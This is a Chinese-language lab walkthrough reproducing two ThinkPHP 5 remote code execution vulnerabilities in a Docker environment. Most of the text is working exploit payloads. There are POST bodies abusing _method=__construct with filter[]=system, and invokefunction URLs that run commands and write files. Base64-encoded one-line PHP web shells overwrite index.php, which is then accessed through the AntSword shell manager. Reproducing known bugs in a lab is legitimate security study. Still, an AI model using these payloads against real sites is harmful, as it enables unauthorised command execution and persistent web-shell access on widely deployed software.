ThinkPHP5系列远程代码执行漏洞复现（详细）

一：5.0.23-rce版本漏洞复现

漏洞描述

ThinkPHP是一款运用极广的PHP开发框架。其版本5中，由于框架对控制器名没有进行足够的检测，会导致在没有开启强制路由的情况下可执行任意方法，从而导致远程命令执行漏洞。 漏洞危害

环境搭建

启动环境

切换到/thinkphp/5.0.23-rce# 目录下

<code class="language-plaintext hljs">vim docker-compose.yml </code>

将version改为2，保存并退出

接着执行

<code class="language-plaintext hljs">docker-compose up -d</code>

此时环境搭建成功

漏洞复现

在网页上利用POST构造payload

（1）查看目录下的文件（ls）

<code class="language-plaintext hljs">_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls</code>

（2）查看id

<code class="language-plaintext hljs">_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id</code>

（3）查看当前目录

<code class="language-plaintext hljs">_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd</code>

将上述代码改为phpinfo，发现是可以输出关于 PHP 配置的信息

<code class="language-plaintext hljs">_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1</code>

利用蚁剑工具getshell

由于存在过滤，需要用到base64加密来使我们的一句话木马上传成功

我们知道了一定存在index.php这个文件，那么我们就对其进行修改为一句话木马的样式

利用 echo “” >index.php 进行测试

为了显示我们成功注入，我们在其中添加字段变为

echo “aaabbb” >index.php

对引号内的进行base64，注意此时的引号不需要进行加密

经过测试，发现eval函数是注入不了的，需要替换为arrest函数才可以成功注入

所以

 

将aaa<?php @assert($_POST['xss']);?>bbb 进行base64编码

 

 

<code class="language-plaintext hljs">_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n YWFhPD9waHAgQGFzc2VydCgkX1BPU1RbJ3hzcyddKTs/PmJiYg== | base64 -d > index.php</code>

成功回显出aaabbb，说明是加入到了index.php里了

开始用蚁剑，URL地址填写我们一句话木马的位置

注意要选择char16和base64

测试连接成功

可以看到我们刚才写入的一句话

 

二：5-rce版本漏洞复现（Thinkphp5 5.0.22/5.1.29）

环境搭建

 

启动环境

切换到/thinkphp/5-rce# 目录下

 

<code class="language-plaintext hljs">vim docker-compose.yml </code>

将version改为2，保存并退出

接着执行

<code class="language-plaintext hljs">docker-compose up -d</code>

此时环境以成功搭建

漏洞复现

（1）输出关于 PHP 配置的信息

<code class="language-plaintext hljs">/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100</code>

（2）whoami

<code class="language-plaintext hljs">/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami</code>

（3）还可以将php代码写入文件

<code class="language-plaintext hljs">/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php phpinfo(); ?></code>

接着访问shell.php

 

利用蚁剑工具getshell

由于存在过滤，需要用到base64加密来使我们的一句话木马上传成功

我们知道了一定存在index.php这个文件，那么我们就对其进行修改为一句话木马的样式

<code class="language-plaintext hljs">aa<?php @eval($_REQUEST['attack']) ?>bb</code>

将上面的一句话进行base64加密

将一句话写入index.php

<code class="language-plaintext hljs">/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo -n YWE8P3BocCBAZXZhbCgkX1JFUVVFU1RbJ2F0dGFjayddKSA/PmJi | base64 -d > index.php</code>

成功回显出aabb，说明是加入到了index.php里了

开始用蚁剑，URL地址填写我们一句话木马的位置

注意要选择char16和base64

测试连接成功

可以看到我们刚才写入的一句话

此时复现圆满完成~